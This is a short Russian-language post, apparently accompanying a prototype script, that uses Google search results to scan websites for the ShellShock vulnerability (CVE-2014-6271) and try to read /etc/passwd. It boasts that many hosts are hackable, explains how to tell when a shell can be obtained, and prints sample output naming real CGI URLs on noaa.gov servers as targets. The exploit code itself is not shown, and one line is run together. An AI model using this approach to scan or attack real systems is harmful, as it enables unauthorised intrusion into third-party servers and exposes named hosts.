
Использование Google для сканирования сайтов на "ShellShock" (CVE-2014-6271)
sudo pip install shellЯ использую google для поиска по первым 1000 сайтам и пытаюсь получить /etc/passwd
После тестирования обнаруживается очень много хостов, которые можно взломать!!!!
Кстати, это всего лишь прототип, он даёт ложные срабатывания.
Вывод выглядит так:
если второе поле равно !!!, то вы можете получить SHELL!
$ python shellshock.py
0 --- http://nomad3.ncep.noaa.gov/cgi-bin/pdisp_sst.sh
1 --- http://nomad5.ncep.noaa.gov/cgi-bin/pdisp_gfs.sh?ctlfile=gfs_00z.ctl&povlp=noovlp&ptype=map&dir